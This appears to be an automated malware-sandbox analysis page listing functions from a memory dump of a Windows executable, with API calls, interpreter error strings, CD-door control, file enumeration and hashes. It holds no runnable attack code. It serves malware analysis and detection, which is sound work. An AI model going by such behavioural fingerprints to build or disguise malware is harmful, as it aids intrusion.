Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ButtonChecked$Window$Long$IconicRectVisible
String ID: 0$0
API String ID: 297524919-203156872
Opcode ID: 942fd85ed9965ad314a90d8a0a8b1478ba02de9938592667941c0295e0d8dcf1
Instruction ID: 0f8372dbed939a69599ba3685493f6ecc13d346459a327b7946208a6b347526d
Opcode Fuzzy Hash: 942fd85ed9965ad314a90d8a0a8b1478ba02de9938592667941c0295e0d8dcf1
Instruction Fuzzy Hash: F0D1037262015182FB669B27DC50BF92292E74DBD4F649A21FF5F476F4DB78C9828300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140020316, Relevance: 21.2, Strings: 16, Instructions: 1159COMMON

Download Yara Rule

Strings

The leftmost character above is illegal in an expression., xrefs: 00000001400213A3
Unexpected %, xrefs: 000000014002136B
Quote marks are required around this key., xrefs: 00000001400209E8
default, xrefs: 00000001400205E4
'\;`, xrefs: 0000000140020BB0
<>=/|^,:*&~!()[]{}", xrefs: 0000000140020640
Too many var/func refs., xrefs: 00000001400213E2
<>=/|^,:*&~!()[]{}+-?., xrefs: 0000000140020AEF, 0000000140020B0D, 0000000140020B24, 0000000140021200
MZ@, xrefs: 00000001400204CC, 000000014002146C
Not allowed as an output variable., xrefs: 000000014002137A
Missing close-quote, xrefs: 000000014002138D
=, xrefs: 0000000140020912
_$#@, xrefs: 0000000140020DB1
Ambiguous or invalid use of ".", xrefs: 00000001400213B6, 00000001400213CC
<>=/|^,:*&~!()[]{}+-?, xrefs: 0000000140020844, 00000001400208AE, 00000001400208D4
Out of memory., xrefs: 00000001400213FF

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: <>=/|^,:*&~!()[]{}"$ <>=/|^,:*&~!()[]{}+-?$ <>=/|^,:*&~!()[]{}+-?.$ =$'\;`$Ambiguous or invalid use of "."$MZ@$Missing close-quote$Not allowed as an output variable.$Out of memory.$Quote marks are required around this key.$The leftmost character above is illegal in an expression.$Too many var/func refs.$Unexpected %$_$#@$default
API String ID: 0-1590349257
Opcode ID: 12fee36f7b429e574e79b0241be997cdde90908a087831e471c4082a21f9047b
Instruction ID: febf30f66262b4072f17091d53e221a7bd04be7f61500095fc24dd6037d163ed
Opcode Fuzzy Hash: 12fee36f7b429e574e79b0241be997cdde90908a087831e471c4082a21f9047b
Instruction Fuzzy Hash: D1B2DE7660539185FB769B5790503FA66A1E7ACBC8F85802AFF89076F6E778CC91C300

Uniqueness

Uniqueness Score: -1.00%

Function 000000014008B280, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 152threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32 ref: 000000014008B29D

Strings

Shell_TrayWnd, xrefs: 000000014008B2DC

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ProcessThreadWindow
String ID: Shell_TrayWnd
API String ID: 1653199695-2988720461
Opcode ID: af0ae490bfa706dd4df400ccd2f8f0b53443cf4621feaa1e7369ee1b1783d993
Instruction ID: fef1b80c479ffb631e896bb2a4a656aa16d301bf8935b1fd13802965155cc47b
Opcode Fuzzy Hash: af0ae490bfa706dd4df400ccd2f8f0b53443cf4621feaa1e7369ee1b1783d993
Instruction Fuzzy Hash: F2519172314B4187FB6A9B27A85179E67A1BB89BC4F082024FF4A47FB5DF39C6458700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140049040, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 146COMMON

Download Yara Rule

APIs

SetVolumeLabelW.KERNEL32 ref: 00000001400490F5
mciSendStringW.WINMM ref: 0000000140049194
mciSendStringW.WINMM ref: 00000001400491D2
mciSendStringW.WINMM ref: 0000000140049229
mciSendStringW.WINMM ref: 0000000140049240

Strings

\, xrefs: 00000001400490D0
set cdaudio door %s wait, xrefs: 0000000140049176
open %s type cdaudio alias cd wait shareable, xrefs: 00000001400491AF
close cd wait, xrefs: 0000000140049232
set cd door %s wait, xrefs: 000000014004920B
open, xrefs: 0000000140049166, 00000001400491FB
closed, xrefs: 000000014004915F, 00000001400491F4

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: SendString$LabelVolume
String ID: \$close cd wait$closed$open$open %s type cdaudio alias cd wait shareable$set cd door %s wait$set cdaudio door %s wait
API String ID: 3382583479-1210049163
Opcode ID: 913b187aa5b9b5e252fce23aa64d5eb8760a3486f91e874d35c4a274f1e16616
Instruction ID: 0a41b2da1cd0aa6fdf13d02659ab20906403110e266a04b6f531d4e7b5db003a
Opcode Fuzzy Hash: 913b187aa5b9b5e252fce23aa64d5eb8760a3486f91e874d35c4a274f1e16616
Instruction Fuzzy Hash: 6951C47121464091FB62EB23A554BEA2360EB9D7E0F855532FB1A93AF5DF38C588C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D423, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 143filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546
FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: f10bbfd2097663f08c5abbd5da8b83897529a08a847e97a00ba1a90912ed480e
Instruction ID: 17d415cb683f57c506936e8cd814376e17ae56f639a3e42e061eba51d8c6a65b
Opcode Fuzzy Hash: f10bbfd2097663f08c5abbd5da8b83897529a08a847e97a00ba1a90912ed480e
Instruction Fuzzy Hash: 3E61A136604A8095EB629F26E4843ED73A1F3887E8F554227FB5943AF8DF78C585CB04

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D44D, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 143filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546
FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: b0206d709dadf015ed557c885c7366f6bdf9beee475ff4074c7390db81c51c09
Instruction ID: 8aa24f51dd5b4267e96774c514b7d2274ca71651ab8994a7e99465caa64c8407
Opcode Fuzzy Hash: b0206d709dadf015ed557c885c7366f6bdf9beee475ff4074c7390db81c51c09
Instruction Fuzzy Hash: 6B61B036604A8495EB629F26E4843ED73A1F3887E8F514227FB5943AF8DF78C585CB04

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D478, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 143filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546
FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: c68a822d2c0538e7e409a627197b738a8dec189d4ed06749bffbf0d3bf7dfe75
Instruction ID: 77f6842684eef27bee177c0b1538653a41d5c9cd53f982be11e8a040fb4bf793
Opcode Fuzzy Hash: c68a822d2c0538e7e409a627197b738a8dec189d4ed06749bffbf0d3bf7dfe75
Instruction Fuzzy Hash: 3861A076604A8095EB629F26E4843ED73A1F3887E8F514227FB5943AF8DF78C585CB04

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D4A0, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 143filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546
FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: 961fe227c1ad1d6a1d6f97aef67934f7038cf6c1b4949cf4edf5a581203098f8
Instruction ID: b02f33644fe0acc9ebc52f6b55c965ac8702220ca39f72c191a1f38014562640
Opcode Fuzzy Hash: 961fe227c1ad1d6a1d6f97aef67934f7038cf6c1b4949cf4edf5a581203098f8
Instruction Fuzzy Hash: E361B336604A8095EB629F26E4843ED73A1F3887E8F554227FB5943AF8DF78C585CB04

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D4BE, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 143filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546
FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: 34e4b29cd84762cdb4da7f8591f7ad8c69527547529331d90fbc4a4dba2345c8
Instruction ID: 00f162f64a9b1ebcdd1c7dc22a08988207678a7861fd86c2c1a323c4448a0676
Opcode Fuzzy Hash: 34e4b29cd84762cdb4da7f8591f7ad8c69527547529331d90fbc4a4dba2345c8
Instruction Fuzzy Hash: E561B27660468095EB629F26E4843ED73A1F388BE8F514227FB5943AF8DF78C585CB04

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D4DF, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 143filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546
FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: ad26a0d7ee202e7d1107a29aa5cf37b16bc37d7844a7b0120ace989ea18a83d2
Instruction ID: 31d7002fb2f6d1d7f3bdd597d29ef7fcad624c74cf4c8c62e43fe8746aaa3ec5
Opcode Fuzzy Hash: ad26a0d7ee202e7d1107a29aa5cf37b16bc37d7844a7b0120ace989ea18a83d2
Instruction Fuzzy Hash: 4861A13660468095EB629F26E4943ED73A1F3887E8F514227FB5943AF8DF78C585CB04

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D500, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 142filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546
FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: c774ab6952abc13e7aaa1f19df1e67b9d59730aa5aa4043a72f1daa241c2cc71
Instruction ID: 50b0ee84789ff58591e564e8d968b6e4e516c419b7274286c9a5b99d8a2a70dd
Opcode Fuzzy Hash: c774ab6952abc13e7aaa1f19df1e67b9d59730aa5aa4043a72f1daa241c2cc71
Instruction Fuzzy Hash: 1F61B336604A8095EB629F26E4843ED73A1F3897E8F514227FB5943AF8DF78C585CB04

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D405, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 132filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546

Part of subcall function 0000000140035590: new.LIBCMT ref: 0000000140035613

FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: 07466e47bc78411de3cf7f3585ebed1b0872ec13d9ebca15a3ce50b7c05b1dc8
Instruction ID: 35e987b1d5facbce7ee44da8068915c2c2651df770dea58d64d59c998c54a353
Opcode Fuzzy Hash: 07466e47bc78411de3cf7f3585ebed1b0872ec13d9ebca15a3ce50b7c05b1dc8
Instruction Fuzzy Hash: C861C33660468095EB629F26E4943ED73A0F388BE8F550227FB5943AF8DF78C585CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D40F, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 132filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546

Part of subcall function 0000000140035590: new.LIBCMT ref: 0000000140035613

FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: 35b2b452b0df8881747b2c1f614b890972cb8c9d2cf3e9f381a1d6abb9c43e57
Instruction ID: a83532820a1abfd9b14215fbfb241cf2f854a06cd6e780109c7e8a0ed3e04e3f
Opcode Fuzzy Hash: 35b2b452b0df8881747b2c1f614b890972cb8c9d2cf3e9f381a1d6abb9c43e57
Instruction Fuzzy Hash: 7661C33660468095EB629F26E4943ED73A0F388BE8F550227FB5943AF8DF78C585CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004D419, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 132filewindowCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32 ref: 000000014004D53C
GetLastError.KERNEL32 ref: 000000014004D546

Part of subcall function 0000000140035590: new.LIBCMT ref: 0000000140035613

FindNextFileW.KERNEL32 ref: 000000014004D56B
FindClose.KERNEL32 ref: 000000014004D57E
FindFirstFileW.KERNEL32 ref: 000000014004D5CC
GetTickCount.KERNEL32 ref: 000000014004D600
PeekMessageW.USER32 ref: 000000014004D632
GetTickCount.KERNEL32 ref: 000000014004D649
FindNextFileW.KERNEL32 ref: 000000014004D6EA
FindClose.KERNEL32 ref: 000000014004D6FB

Strings

%s\%s, xrefs: 000000014004D6A7
*.*, xrefs: 000000014004D5A5

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseCountNextTick$AttributesErrorFirstLastMessagePeek
String ID: %s\%s$*.*
API String ID: 1500295794-3420517325
Opcode ID: e1a3217e84934d31b6b1b21d0a9763d87545311faa5bce3864390448fa5fb7ac
Instruction ID: ad2c741b9bc293966b91f4734fc2afad30f90b1132be674504a1a9ccfe384ed1
Opcode Fuzzy Hash: e1a3217e84934d31b6b1b21d0a9763d87545311faa5bce3864390448fa5fb7ac
Instruction Fuzzy Hash: B661C33660468095EB629F26E4943ED73A0F388BE8F550227FB5943AF8DF78C585CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001D5A9, Relevance: 20.9, APIs: 1, Strings: 12, Instructions: 1371COMMON

Download Yara Rule

Strings

<>=/|^,:*&~!()[]{}+-?.", xrefs: 000000014001E815
"%s" requires at least %d parameter%s., xrefs: 000000014001F5D5
This line does not contain a recognized action., xrefs: 000000014001E93A
+, xrefs: 000000014001F3B6
MZ@, xrefs: 000000014001E4C2, 000000014001E515, 000000014001E75F, 000000014001E7BE, 000000014001E885, 000000014001E8C2, 000000014001E955, 000000014001E965, 000000014001E970, 000000014001EA84, 000000014001F2C3, 000000014001F320, 000000014001F674, 000000014001F98E, 000000014001F9DE
"%s" requires that parameter #%u be non-blank., xrefs: 000000014001F699
new, xrefs: 000000014001E8FE
Syntax error or too many variables in "For" statement., xrefs: 000000014001F1D3
] , xrefs: 000000014001DC56
Invalid hotkey., xrefs: 000000014001E930
Parameter #1 required, xrefs: 000000014001FB56
This "For" is missing its "in"., xrefs: 000000014001F172

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
